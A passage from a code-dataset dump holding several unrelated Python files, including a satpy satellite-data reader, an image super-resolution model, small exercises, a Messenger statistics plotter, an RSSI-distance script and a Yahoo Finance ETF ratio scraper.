get_area_def\nfrom satpy.dataset import Dataset\nfrom satpy.readers.file_handlers import BaseFileHandler\nfrom satpy.utils import proj_units_to_meters\nfrom satpy import CHUNK_SIZE\nlogger = logging.getLogger(__name__)\n\nPLATFORM_NAMES = {'MET-08': 'Meteosat-8',\n 'MET-09': 'Meteosat-9',\n 'MET-10': 'Meteosat-10',\n 'MET-11': 'Meteosat-11', }\n\n\nclass NcLIFileHandler(BaseFileHandler):\n\n \"\"\"MSG OCA NetCDF reader.\"\"\"\n\n def __init__(self, filename, filename_info, filetype_info):\n \"\"\"Init method.\"\"\"\n super(NcLIFileHandler, self).__init__(filename, filename_info,\n filetype_info)\n\n self.nc = xr.open_dataset(self.filename,\n decode_cf=True,\n mask_and_scale=False,\n chunks={'pixels': CHUNK_SIZE})\n\n# import pdb; pdb.set_trace()\n self.nc.attrs['x'] = 5568\n self.nc.attrs['y'] = 5568\n\n self.nc = self.nc.rename({'pixels': 'x', 'pixels': 'y'})\n\n # the processing_time is taken from the filename, however could be taken from remote_sensing_start_time if/when attribute is set properly.\n # self.processing_time = filename_info['year']+'-'+filename_info['month']+'-'+filename_info['day']+'T'+filename_info['hour']+':'+filename_info['min']+':00Z'\n self.processing_time = '2018-11-01T12:00:00Z'\n# %Y-%m-%dT%H:%M:%SZ\n# print(self.%Y-%m-%dT%H:%M:%SZnc)\n\n # self.sensor = self.nc.attrs['instrument']\n self.sensor = 'SEVIRI'\n # sat_id = str(self.nc.attrs['spacecraft'])\n sat_id = 'MET-10'\n\n self.mda = {}\n self.mda['projection_parameters'] = {'a': '6378169.0',\n 'b': '6356583.8',\n 'h': 35785831.00,\n 'ssp_longitude': '0.0'}\n\n self.mda['number_of_lines'] = self.nc.attrs['y']\n self.mda['number_of_columns'] = self.nc.attrs['x']\n\n try:\n self.platform_name = PLATFORM_NAMES[sat_id]\n except KeyError:\n self.platform_name = PLATFORM_NAMES[sat_id.astype(str)]\n\n def get_dataset(self, dataset_id, dataset_info):\n\n z = self.nc[dataset_info['nc_key']]\n\n xvals = np.array(self.nc['x'])\n yvals = np.array(self.nc['y'])\n a = da.from_array(np.zeros([5568, 5568]), chunks=CHUNK_SIZE)\n a = np.zeros([5568, 5568])\n a[(5568-yvals), (xvals)] = np.array(z)\n a[a == 0] = np.nan\n\n dataset = xr.DataArray(da.from_array(a, chunks=CHUNK_SIZE), dims=['y', 'x']).astype(np.int16)\n\n dataset.attrs.update(dataset_info)\n\n dataset.attrs['_FillValue'] = np.nan\n\n return dataset\n\n def get_area_def(self, dsid):\n a = self.mda['projection_parameters']['a']\n b = self.mda['projection_parameters']['b']\n h = self.mda['projection_parameters']['h']\n lon_0 = self.mda['projection_parameters']['ssp_longitude']\n\n proj_dict = {'a': float(a),\n 'b': float(b),\n 'lon_0': float(lon_0),\n 'h': float(h),\n 'proj': 'geos',\n 'units': 'm'}\n\n nlines = self.mda['number_of_lines']\n ncols = self.mda['number_of_columns']\n\n area_extent = (-5570248.477339745,\n -5567248.074173927,\n 5567248.074173927,\n 5570248.477339745)\n\n area = get_area_def('some_area_name',\n \"On-the-fly area\",\n 'geosmsg',\n proj_dict,\n ncols,\n nlines,\n area_extent)\n\n return area\n\n @property\n def start_time(self):\n try:\n\n return datetime.strptime(self.processing_time,\n '%Y-%m-%dT%H:%M:%SZ')\n\n except TypeError:\n\n return datetime.strptime(\n self.processing_time.astype(str),\n '%Y-%m-%dT%H:%M:%SZ')\n\n @property\n def end_time(self):\n try:\n\n minutes = timedelta(minutes=15)\n return datetime.strptime(self.processing_time,\n '%Y-%m-%dT%H:%M:%SZ')+minutes\n except TypeError:\n\n return datetime.strptime(\n self.processing_time.astype(str),\n '%Y-%m-%dT%H:%M:%SZ')+minutes\n","repo_name":"manucarran/satpy-localReaders","sub_path":"nc_mtg_li.py","file_name":"nc_mtg_li.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70236706817","text":"import math\nimport numbers\nimport os.path as osp\n\nimport mmcv\nimport torch\n\nfrom mmedit.core import tensor2img\nfrom ..registry import MODELS\nfrom .basic_restorer import BasicRestorer\n\n\n@MODELS.register_module()\nclass LIIF(BasicRestorer):\n \"\"\"LIIF model for single image super-resolution.\n\n Paper: Learning Continuous Image Representation with\n Local Implicit Image Function\n\n Args:\n generator (dict): Config for the generator.\n pixel_loss (dict): Config for the pixel loss.\n rgb_mean (tuple[float]): Data mean.\n Default: (0.5, 0.5, 0.5).\n rgb_std (tuple[float]): Data std.\n Default: (0.5, 0.5, 0.5).\n train_cfg (dict): Config for train. Default: None.\n test_cfg (dict): Config for testing. Default: None.\n pretrained (str): Path for pretrained model. Default: None.\n \"\"\"\n\n def __init__(self,\n generator,\n pixel_loss,\n rgb_mean=(0.5, 0.5, 0.5),\n rgb_std=(0.5, 0.5, 0.5),\n train_cfg=None,\n test_cfg=None,\n pretrained=None):\n super().__init__(\n generator,\n pixel_loss,\n train_cfg=train_cfg,\n test_cfg=test_cfg,\n pretrained=pretrained)\n\n # norm\n rgb_mean = torch.FloatTensor(rgb_mean)\n rgb_std = torch.FloatTensor(rgb_std)\n self.lq_mean = rgb_mean.view(1, -1, 1, 1)\n self.lq_std = rgb_std.view(1, -1, 1, 1)\n self.gt_mean = rgb_mean.view(1, 1, -1)\n self.gt_std = rgb_std.view(1, 1, -1)\n\n def train_step(self, data_batch, optimizer):\n \"\"\"Train step.\n\n Args:\n data_batch (dict): A batch of data, which requires\n 'coord', 'lq', 'gt', 'cell'\n optimizer (obj): Optimizer.\n\n Returns:\n dict: Returned output, which includes:\n log_vars, num_samples, results (lq, gt and pred).\n \"\"\"\n # data\n coord = data_batch['coord']\n cell = data_batch['cell']\n lq = data_batch['lq']\n gt = data_batch['gt']\n\n # norm\n self.lq_mean = self.lq_mean.to(lq)\n self.lq_std = self.lq_std.to(lq)\n self.gt_mean = self.gt_mean.to(gt)\n self.gt_std = self.gt_std.to(gt)\n lq = (lq - self.lq_mean) / self.lq_std\n gt = (gt - self.gt_mean) / self.gt_std\n\n # generator\n pred = self.generator(lq, coord, cell)\n\n # loss\n losses = dict()\n log_vars = dict()\n losses['loss_pix'] = self.pixel_loss(pred, gt)\n\n # parse loss\n loss, log_vars = self.parse_losses(losses)\n\n # optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n log_vars.pop('loss') # remove the unnecessary 'loss'\n outputs = dict(\n log_vars=log_vars,\n num_samples=len(gt.data),\n results=dict(lq=lq.cpu(), gt=gt.cpu(), output=pred.cpu()))\n\n return outputs\n\n def forward_test(self,\n lq,\n gt,\n coord,\n cell,\n meta=None,\n save_image=False,\n save_path=None,\n iteration=None):\n \"\"\"Testing forward function.\n\n Args:\n lq (Tensor): LQ image.\n gt (Tensor): GT image.\n coord (Tensor): Coord tensor.\n cell (Tensor): Cell tensor.\n meta (list[dict]): Meta data, such as path of GT file.\n Default: None.\n save_image (bool): Whether to save image. Default: False.\n save_path (str): Path to save image. Default: None.\n iteration (int): Iteration for the saving image name.\n Default: None.\n\n Returns:\n dict: Output results, which contain either key(s)\n 1. 'eval_result'.\n 2. 'lq', 'pred'.\n 3. 'lq', 'pred', 'gt'.\n \"\"\"\n\n # norm\n self.lq_mean = self.lq_mean.to(lq)\n self.lq_std = self.lq_std.to(lq)\n lq = (lq - self.lq_mean) / self.lq_std\n\n # generator\n with torch.no_grad():\n pred = self.generator(lq, coord, cell, test_mode=True)\n self.gt_mean = self.gt_mean.to(pred)\n self.gt_std = self.gt_std.to(pred)\n pred = pred * self.gt_std + self.gt_mean\n pred.clamp_(0, 1)\n\n # reshape for eval\n ih, iw = lq.shape[-2:]\n s = math.sqrt(coord.shape[1] / (ih * iw))\n shape = [lq.shape[0], round(ih * s), round(iw * s), 3]\n pred = pred.view(*shape).permute(0, 3, 1, 2).contiguous()\n if gt is not None:\n gt = gt.view(*shape).permute(0, 3, 1, 2).contiguous()\n\n if self.test_cfg is not None and self.test_cfg.get('metrics', None):\n assert gt is not None, (\n 'evaluation with metrics must have gt images.')\n results = dict(eval_result=self.evaluate(pred, gt))\n else:\n results = dict(lq=lq.cpu(), output=pred.cpu())\n if gt is not None:\n results['gt'] = gt.cpu()\n\n # save image\n if save_image:\n gt_path = meta[0]['gt_path']\n folder_name = osp.splitext(osp.basename(gt_path))[0]\n if isinstance(iteration, numbers.Number):\n save_path = osp.join(save_path, folder_name,\n f'{folder_name}-{iteration + 1:06d}.png')\n elif iteration is None:\n save_path = osp.join(save_path, f'{folder_name}.png')\n else:\n raise ValueError('iteration should be number or None, '\n f'but got {type(iteration)}')\n mmcv.imwrite(tensor2img(pred), save_path)\n\n return results\n\n def init_weights(self, pretrained=None, strict=True):\n \"\"\"Init weights for models.\n\n Args:\n pretrained (str, optional): Path for pretrained weights. If given\n None, pretrained weights will not be loaded. Defaults to None.\n strict (boo, optional): Whether strictly load the pretrained model.\n Defaults to True.\n \"\"\"\n\n self.generator.init_weights(pretrained, strict)\n","repo_name":"IceClear/CLIP-IQA","sub_path":"mmedit/models/restorers/liif.py","file_name":"liif.py","file_ext":"py","file_size_in_byte":6322,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"79"} +{"seq_id":"3538519689","text":"# Faça um programa que leia três números inteiros e mostre qual é o maior e qual é o menor.\r\n\r\nnum = []\r\nmaior = 0\r\nmenor = 0\r\nfor i in range(0,3):\r\n num.append(int(input(f'Entre com o {i+1}º números: ')))\r\n\r\n if num[i] > maior:\r\n maior = num[i]\r\n else:\r\n menor = num[i]\r\n\r\nprint(f'O menor número é {menor}')\r\nprint(f'O maior número é {maior}')\r\n","repo_name":"GuuhRodrigues/Python_funcional","sub_path":"ex34.py","file_name":"ex34.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11331097142","text":"# This script is combination of Find difference and Compare definition\n__version__ = \"1.1.0\"\nimport tkinter as tk\n\nimport compare_excels as fd\nimport compare_by_key as cd\n\n\ndef setup_gui():\n # Creation of GUI\n\n def exit_():\n root.destroy()\n root.quit()\n\n root = tk.Tk()\n \n screen_width = root.winfo_screenwidth()\n screen_height = root.winfo_screenheight()\n window_width = 400\n window_height = 150\n center_x = int(screen_width / 2 - window_width / 2)\n center_y = int(screen_height / 2 - window_height / 2)\n\n root.title(\"Find difference\")\n root.geometry(f'{window_width}x{window_height}+{center_x}+{center_y}')\n btn1 = tk.Button(\n root,\n text='Compare two excels',\n command=lambda: fd.start(root),\n padx=15,\n pady=5\n )\n\n btn1.pack(expand=True, side=tk.TOP)\n\n btn2 = tk.Button(\n root,\n text='Compare to excels by unique key',\n command=lambda: cd.start(root),\n padx=20,\n pady=5\n )\n btn2.pack(expand=True, side=tk.TOP)\n\n btn3 = tk.Button(\n root,\n text='Exit',\n command=exit_,\n padx=25,\n pady=5\n )\n btn3.pack(expand=True, side=tk.BOTTOM)\n\n tk.mainloop()\n\n\nif __name__ == '__main__':\n setup_gui()\n","repo_name":"AlVlZak/Compare-Excel-files","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14330546670","text":"import ast\nimport os\nimport sys\n\nfrom inspect import signature\nfrom parameters import *\n\nfrom essentials import convert_to_list\nfrom essentials import convert_to_list_nested\nfrom graphs import draw_plot\nfrom graphs import draw_combined_plot\nimport calculate as cal\nimport essentials\nimport counters as count\nimport datetime as dt\n\n\ndef stat_call(data_range: Filepart):\n\n smaller_functions = [(cal.emoji_all_count,\n \"Liczba otrzymanych reakcji pod swoimi wiadomościami\",\n \"Stosunek otrzymanych reakcji do napisanych wiadomości przez użytkownika\"), # emoji count\n (cal.emoji_heart_count,\n \"Liczba otrzymanych serduszek pod wiadomościami na konwersacji\",\n \"Stosunek otrzymanych serduszek do napisanych wiadomości przez użytkownika\"), # heart count\n (cal.giving_reactions,\n \"Liczba dawanych reakcji pod wiadomościami\",\n \"Stosunek dawanych reakcji do napisanych wiadomości przez użytkownika\"), # giving reactions\n (cal.find_word,\n \"Liczba napisanych '\" + values.find_word + \"' przez użytkownika\",\n \"Stosunek napisanych '\" + values.find_word + \"' do napisanych wiadomości przez użytkownika\")] # word count\n\n # all messages\n all_messages = cal.message_count(data_range)\n\n # draw all messages plot\n draw_plot(convert_to_list(all_messages), \"Liczba wiadomości wysłanych przez osoby\",\n values.save_graphs, values.path, 1)\n\n for count, function in zip(range(2, len(smaller_functions)+2), smaller_functions):\n calculate_and_draw(function[0], data_range,\n function[1], count, all_messages, function[2], len(smaller_functions)+1)\n\n # multimedia data\n multimedia_messages = cal.multimedia(data_range)\n\n # draw multimedia plot\n draw_combined_plot(convert_to_list_nested(multimedia_messages), \"Liczba multimediów wysłanych przez osoby\",\n values.save_graphs, values.path, len(smaller_functions)+2)\n\n\ndef calculate_and_draw(function, data_range, title, number, all_messages, ratio_title, function_count):\n # calculate\n if len(signature(function).parameters) > 1:\n result = function(data_range, values.find_word)\n else:\n result = function(data_range)\n\n draw_plot(convert_to_list(result), title,\n values.save_graphs, values.path, number)\n draw_plot(convert_to_list(cal.ratio(result, all_messages)),\n ratio_title, values.save_graphs, values.path, number+function_count)\n\n\ndef count_call(data_range: Filepart):\n count.print_keys(data_range)\n # words = count.count_words(data_range)\n # words = essentials.remove_small(words, 1000)\n # draw_plot(convert_to_list(words), \"Liczba napisanych słów\",values.save_graphs, values.path,0)\n\n\ndef get_selected_files():\n # * Get data from files\n my_files_name = []\n os.chdir(values.messages_directory)\n for file in os.listdir():\n if file.endswith(\".json\"):\n my_files_name.append(file)\n my_json = list(map(essentials.read_json, my_files_name))\n os.chdir(\"..\") # Exit from folder with messages\n return my_json\n\n\ndef remove_duplicated_messages(my_json):\n # * Remove duplicates\n users = set()\n messages = set()\n for file in my_json:\n for message in file[\"messages\"]:\n messages.add(str(message))\n for user in file[\"participants\"]:\n users.add(str(user))\n new_json = {}\n new_json[\"messages\"] = [ast.literal_eval(message) for message in messages]\n new_json[\"users\"] = [ast.literal_eval(user) for user in users]\n return new_json\n\n\n# main function\ndef main():\n\n my_json = get_selected_files()\n new_json = remove_duplicated_messages(my_json)\n # Convert given dates to unix\n start_date = essentials.date_to_unix(values.start_date_values)\n end_date = essentials.date_to_unix(values.end_date_values)\n\n print(\n # sys.argv[1],\n f'oldest: {format_time(cal.find_time(new_json) / 1000)}',\n f'newest: {format_time(cal.find_time(new_json, max) / 1000)}',\n f'message count: {len(new_json[\"messages\"])}', sep=\" | \")\n\n data_range = Filepart(new_json, start_date, end_date)\n stat_call(data_range)\n # count_call(data_range)\n\n\ndef format_time(timestamp):\n file_time = dt.datetime.fromtimestamp(timestamp)\n return file_time.strftime(\"%d-%m-%Y\")\n\n\ndef read_args():\n if len(sys.argv) < 5 or sys.argv[1][0] == '-':\n print(\"Usage:\" + sys.argv[\n 0] + \" \")\n sys.exit(1)\n else:\n files = sys.argv[1]\n start_date = [int(i) for i in sys.argv[2][1:-1].split(\",\")]\n end_date = [int(i) for i in sys.argv[3][1:-1].split(\",\")]\n word = sys.argv[4]\n save = bool(sys.argv[5] == \"True\")\n if save == True:\n path = sys.argv[6]\n print(path)\n else:\n path = \"\"\n return Parameters(files, start_date, end_date, word, save, path)\n\n\n# function for testing single counters\ndef test():\n my_json = get_selected_files()\n new_json = remove_duplicated_messages(my_json)\n # Convert given dates to unix\n start_date = essentials.date_to_unix(values.start_date_values)\n end_date = essentials.date_to_unix(values.end_date_values)\n\n print(\n # sys.argv[1],\n f'oldest: {format_time(cal.find_time(new_json) / 1000)}',\n f'newest: {format_time(cal.find_time(new_json, max) / 1000)}',\n f'message count: {len(new_json[\"messages\"])}', sep=\" | \")\n\n data_range = Filepart(new_json, start_date, end_date)\n\n # all messages\n all_messages = cal.message_count(data_range)\n\n # draw all messages plot\n draw_plot(convert_to_list(all_messages), \"Liczba wiadomości wysłanych przez osoby\",\n values.save_graphs, values.path, 1)\n\n # multimedia\n multimedia_messages = cal.multimedia(data_range)\n\n # draw multimedia chart\n draw_combined_plot(convert_to_list_nested(multimedia_messages), \"Liczba multimediów wysłanych przez osoby\",\n values.save_graphs, values.path, 2)\n\n\n# ACTIVATE!\nif __name__ == \"__main__\":\n values = read_args()\n main()\n # test()\n","repo_name":"Byczax/messenger_graphs_statistics","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"} +{"seq_id":"73096352255","text":"'''\r\n작성일 : 2023년 9월 27일\r\n학과 : 컴퓨터공학부\r\n학번 : 202395001\r\n이름 : 구민수\r\n설명 : 반복문으로 펙초리얼 구하기\r\n'''\r\nnum = int(input(\"정수를 입력하시오: \"))\r\nfact = 1\r\n\r\n# 1부터 num까지의 숫자를 곱하여 팩토리얼을 계산\r\nfor i in range(1, num + 1):\r\n fact *= i\r\n\r\nprint(f\"{num}의 팩토리얼은 {fact}입니다.\")\r\n","repo_name":"westerdif/Data_science","sub_path":"Data_Science_Kms/Chapter5/06_lab_3.py","file_name":"06_lab_3.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8841023479","text":"'''\nSet of procedures to deal with branches\n'''\nfrom TraverseOperations import CopyTraverseInstance\n\nclass BranchCopy:\n def __init__(self, BranchName, Branches): \n '''\n Makes a copy of branch instance\n Removes branches if same as BranchName PntRefNum\n :param BranchName: Name of branch in Branches\n :param Branches:\n '''\n self.Branches = Branches\n self.BranchName = BranchName\n \n def GetCopy(self):\n\n #get branch instance from Branches\n Branch = self.Branches.__getattribute__(self.BranchName)\n #make a copy of branch\n Branch = CopyTraverseInstance.TraverseCopy(Branch)\n \n #set PntRefNum\n PntRefNum = self.BranchName.split(\"_\")[0]\n \n #remove branches corresponding to BranchName or PntRefNum\n Branch = self.CleanUpBranches(Branch, PntRefNum)\n \n return Branch, PntRefNum\n \n def CleanUpBranches(self, traverse, PntRefNum):\n '''\n removes branches from primary, secondary and NonRM lists if they are\n equal to PntRefNum or BranchName\n :param traverse: \n :param PntRefNum: \n :param BranchName: \n :return: traverse\n '''\n \n #primary branches\n traverse.PrimaryBranches = self.removeBranches(traverse.PrimaryBranches,\n PntRefNum)\n # secondary branches\n traverse.SecondaryBranches = self.removeBranches(traverse.SecondaryBranches,\n PntRefNum)\n # primary branches\n traverse.NonRmBranches = self.removeBranches(traverse.NonRmBranches,\n PntRefNum)\n \n return traverse\n \n def removeBranches(self, BranchList, PntRefNum):\n \n if PntRefNum in BranchList:\n BranchList.remove(PntRefNum)\n elif self.BranchName in BranchList:\n BranchList.remove(self.BranchName)\n \n return BranchList\n \ndef GetTraverseBranchNumber(Branches, PntRefNum):\n '''\n In the case of multiple branches from a single point,\n gets an increment number and adds it to the traverse reference in Branches\n :return:\n '''\n\n counter = 0\n for key in Branches.__dict__.keys():\n if key == PntRefNum and counter == 0:\n counter = 1\n elif PntRefNum == key.split(\"_\")[0]:\n increment = int(key.split(\"_\")[1])\n if counter <= increment:\n counter = increment + 1\n\n if counter == 0:\n return PntRefNum\n else:\n return (PntRefNum + \"_\" + str(counter))\n\nclass RemoveTriedBranches:\n def __init__(self, Branches, BranchName):\n self.Branches = Branches\n self.BranchName = BranchName\n\n def RemoveBranchInstance(self):\n '''\n Loops through all Branches in self.Branches and removes BranchName from\n primaryBranches\n :return:\n '''\n\n for key in self.Branches.__dict__.keys():\n Branch = self.Branches.__getattribute__(key)\n if key == \"FirstBranch\" or Branch.__class__.__name__ == \"list\" or \\\n Branch.__class__.__name__ == \"BranchSubClass\" or key == \"CurrentBranch\":\n continue #not a Branch instance - descriptive attributes of Branch class\n \n if self.BranchName in Branch.PrimaryBranches:\n Branch.PrimaryBranches.remove(self.BranchName)\n\n return self.Branches\n \nclass AddBranch:\n def __init__(self, ConnectionFinder, Branches, traverse, PntRefNum, \n LandXML_Obj, Observation):\n '''\n Checks if branch should be created and added to Branches\n Updates Branch Lists\n :param ConnectionFinder: \n :param Branches: \n '''\n \n self.ConnectionFinder = ConnectionFinder\n self.Branches = Branches\n self.traverse = traverse\n self.PntRefNum = PntRefNum\n self.LandXML_Obj = LandXML_Obj\n self.Observation = Observation\n \n def AddBranchInstance(self):\n \n if not self.CheckBranchExists():\n if self.ConnectionFinder.PrimaryBranch or \\\n (self.ConnectionFinder.SecondaryBranch and self.LandXML_Obj.TraverseProps.MixedTraverse):\n self.traverse.PrimaryBranches = self.CreateBranch(self.traverse.PrimaryBranches)\n elif self.ConnectionFinder.SecondaryBranch:\n self.traverse.SecondaryBranches = self.CreateBranch(self.traverse.SecondaryBranches)\n elif self.ConnectionFinder.NonRmBranch and self.LandXML_Obj.TraverseProps.MixedTraverse:\n self.traverse.NonRmBranches = self.CreateBranch(self.traverse.NonRmBranches)\n \n return self.Branches, self.traverse\n \n def CheckBranchExists(self):\n #Check if branch instance already exists\n exists = False\n BranchLabel = None\n for key in self.Branches.__dict__.keys():\n Branch = self.Branches.__getattribute__(key)\n try:\n if key == \"FirstBranch\" or Branch.__class__.__name__ == \"list\" or \\\n Branch.__class__.__name__ == \"BranchSubClass\" or key == \"CurrentBranch\":\n continue\n BranchPnts = Branch.refPnts\n\n if BranchPnts == self.traverse.refPnts:\n #self.AddObservationTrying()\n return True\n break\n except AttributeError:\n pass\n \n return False\n \n \n def CreateBranch(self, BranchList):\n '''\n Creates a branch instance in slef.Branches\n :return: \n '''\n\n BranchLabel = GetTraverseBranchNumber(self.Branches, self.PntRefNum)\n BranchList.append(BranchLabel)\n # create a traverse copy instance and add to Branches\n travCopy = CopyTraverseInstance.TraverseCopy(self.traverse)\n # Add name of parent traverse branch\n setattr(travCopy, \"ParentBranch\", self.traverse.BranchName)\n setattr(travCopy, \"TriedObservation\", self.Observation)\n # get reference number for branch\n setattr(self.Branches, BranchLabel, travCopy)\n \n return BranchList\n \n \n \n\n","repo_name":"sparkes-intrax/CadastreCalcsUI","sub_path":"src/LandXML/BranchOperations.py","file_name":"BranchOperations.py","file_ext":"py","file_size_in_byte":6373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14251657200","text":"import sys\nsys.stdin = open('G.txt')\n\n\ndef get_count(matrix):\n global n, m\n # 나무 판자의 개수\n tree = 0\n\n # '-'를 만났을때 다음칸이 범위를 벗어나거나 '|'를 만나면 판자의 개수 추가\n # '|'를 만났을때 다음행이 범위를 벗어나거나 '_'를 만나면 판자의 개수 추가\n for row in range(n):\n for col in range(m):\n # 해당 값이 -라면\n if matrix[row][col] == '-':\n # 범위를 벗어나지 않고\n if 0 <= col+1 < m:\n # |를 만난다면\n if matrix[row][col+1] == \"|\":\n tree += 1\n else:\n # 범위를 벗어난다면\n tree += 1\n\n # 해당 값이 |라면\n if matrix[row][col] == '|':\n # 범위를 벗어나지 않고\n if 0 <= row+1 < n:\n #-를 만난다면\n if matrix[row+1][col] == \"-\":\n tree += 1\n else:\n # 범위를 벗어난다면 \n tree += 1\n\n return tree\n\n\nn, m = map(int, input().split())\nmatrix = [list(map(str, input())) for _ in range(n)]\n\nanswer = get_count(matrix)\nprint(answer)","repo_name":"woohree/ALGO2ITHM_STUDY","sub_path":"baekjoon/03월/0317 연산자끼워넣기 퇴사 바닥장식/s4_1388_바닥장식/yeonggyeong.py","file_name":"yeonggyeong.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"6663019083","text":"#!/usr/bin/python\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom multiprocessing import Process\nfrom time import sleep\nimport math\n\n\nA = 48.8\nn = 1.5\nstart = 45\ncross = 30\ntitle='two algorithm (rssi => distance)'\n\ndef d1(txPower, rssi):\n if (rssi == 0):\n return -1.0; # if we cannot determine accuracy, return -1.\n\n ratio = rssi*1.0/txPower;\n if (ratio < 1.0):\n return math.pow(ratio,10);\n else:\n accuracy = (0.89976)*math.pow(ratio,7.7095) + 0.111\n return accuracy\n\ndef d2(rssi):\n power = (abs(rssi)- A)/(10.0 * n)\n # print(\" \", power)\n distance = math.pow(10, power)\n return distance\n\n\ndef test():\n # print(d1(A, 78))\n # print(d2(78))\n x = list(range(start, start + cross))\n dd1 = []\n dd2 = []\n for i in x:\n dd1.append(d1(A, i))\n dd2.append(d2(i))\n\n plt.plot(x,dd1,color='b', label='algo from github')\n plt.plot(x,dd2,color='r', label='algo from csdn')\n for i in range(cross):\n if x[i] % 5 == 0:\n plt.annotate(\"(%s)\" % round(dd1[i], 2), xy=(x[i], dd1[i]))\n plt.annotate(\"(%s)\" % round(dd2[i], 2), xy=(x[i], dd2[i] + 5))\n\n plt.xlabel(\"rssi/dbm\")\n plt.ylabel(\"distance/m\")\n plt.legend()\n plt.title('A=%s, n=%s, title=%s' % (A, n, title))\n plt.show()\n\nif __name__ == '__main__':\n test()\n","repo_name":"ginhton/3dpositioning","sub_path":"src/rssi2distance.py","file_name":"rssi2distance.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36469539969","text":"import requests\nimport lxml.html as lh\nimport pandas as pd\nimport numpy as np\n\n### VUG Data\nurl='https://finance.yahoo.com/quote/VUG/history?p=VUG'\npage=requests.get(url)\ndoc=lh.fromstring(page.content)\n\ntr_elements = doc.xpath('//tr')\nfor T in tr_elements:\n if len(T) < 7:\n tr_elements.remove(T)\n\ntr_elements = doc.xpath('//tr')\ncol=[]\ni=0\n\nfor t in tr_elements[0]:\n i+=1\n name=t.text_content()\n col.append((name,[]))\n\nfor j in range(1,len(tr_elements)):\n T=tr_elements[j]\n if len(T) != 7:\n continue\n i=0\n for t in T.iterchildren():\n data=t.text_content()\n if i>0:\n try:\n data=int(data)\n except:\n pass\n col[i][1].append(data)\n i+=1\n\nDict1 = {title:val for (title,val) in col}\ndf1=pd.DataFrame(Dict1)\nvug = df1[['Date', 'Adj Close**']].copy()\nvug_new = vug.rename(columns={'Date':'VUG Date', 'Adj Close**':'VUG Adj Close'})\nvug_new['VUG Adj Close'] = vug_new['VUG Adj Close'].astype(float)\n\n### VTV Data\nurl='https://finance.yahoo.com/quote/vtv/history?p=vtv'\npage=requests.get(url)\ndoc=lh.fromstring(page.content)\n\ntr_elements = doc.xpath('//tr')\nfor T in tr_elements:\n if len(T) < 7:\n tr_elements.remove(T)\n\ntr_elements = doc.xpath('//tr')\ncol=[]\ni=0\n\nfor t in tr_elements[0]:\n i+=1\n name=t.text_content()\n col.append((name,[]))\n\nfor j in range(1,len(tr_elements)):\n T=tr_elements[j]\n if len(T) != 7:\n continue\n i=0\n for t in T.iterchildren():\n data=t.text_content()\n if i>0:\n try:\n data=int(data)\n except:\n pass\n col[i][1].append(data)\n i+=1\n\nDict2 = {title:val for (title,val) in col}\ndf2=pd.DataFrame(Dict2)\nvtv = df2[['Date', 'Adj Close**']].copy()\nvtv_new = vtv.rename(columns={'Date':'VTV Date', 'Adj Close**':'VTV Adj Close'})\nvtv_new['VTV Adj Close'] = vtv_new['VTV Adj Close'].astype(float)\n\n#Combined Dataframes (contains date column & adj close column for VUG & VTV)\nframes = [vug_new, vtv_new]\nnew_df = pd.concat(frames, axis=1)\nlength = len(new_df)\n\n#Created VUG/VTV\ndef ratioAdjClose():\n new_df['VUG/VTV'] = new_df['VUG Adj Close'] / new_df['VTV Adj Close']\n\nratioAdjClose()\n\n#Set new columns in dataframe to null\nNaN = np.nan\n\n#Created Fast MA (10 days)\nnew_df['Fast Ma'] = NaN\ndef fastMA():\n x=0\n y=10\n l=9\n while (y<(length+1)):\n ratio = new_df.iloc[x:y,4]\n sumOfRows = ratio.sum()\n fastMA = sumOfRows/10\n new_df.at[l,'Fast Ma'] = fastMA\n x=x+1\n y=y+1\n l=l+1\n\nfastMA()\n\n#Created Slow MA (40 days)\nnew_df['Slow Ma'] = NaN\ndef slowMA():\n x=0\n y=40\n l=39\n while (y<(length+1)):\n ratio = new_df.iloc[x:y,4]\n sumOfRows = ratio.sum()\n slowMA = sumOfRows/40\n new_df.at[l,'Slow Ma'] = slowMA\n x=x+1\n y=y+1\n l=l+1\n\nslowMA()\n\n#Created Fast-Slow\nnew_df['Fast-Slow'] = NaN\ndef fastMinusSlow():\n new_df['Fast-Slow'] = new_df['Fast Ma'] - new_df['Slow Ma']\n\nfastMinusSlow()\n\n#Created Buy VUG Return\nnew_df['Buy VUG Return'] = NaN\ndef buyReturnVUG():\n x=38\n y=39\n l=39\n while (y 0:\n buyVUG = (currVUG/initVUG) - 1\n new_df.at[l,'Buy VUG Return'] = buyVUG\n else:\n new_df.at[l,'Buy VUG Return'] = 0\n x=x+1\n y=y+1\n l=l+1\n\nbuyReturnVUG()\n\n#Created Buy VTV Return\nnew_df['Buy VTV Return'] = NaN\ndef buyReturnVTV():\n x=38\n y=39\n l=39\n while (y None:\n n_test = 1000\n\n device = torch.device(\"mps\")\n\n vmap_ellipk = vmap(t_ellipk_new)\n vmap_ellipe = vmap(t_ellipe_new)\n\n test_k = torch.arange(-2, 0.9, 2.9 / n_test, dtype=torch.float32, device=device)\n test_k[-1] = 0.0\n\n tic = time.perf_counter()\n ek_scipy = t_ellipk(test_k)\n s_epk = time.perf_counter() - tic\n\n tic = time.perf_counter()\n ek_n = vmap_ellipk(test_k)\n t_epk = time.perf_counter() - tic\n\n assert_close(ek_scipy, ek_n)\n\n test_e = torch.arange(-1, 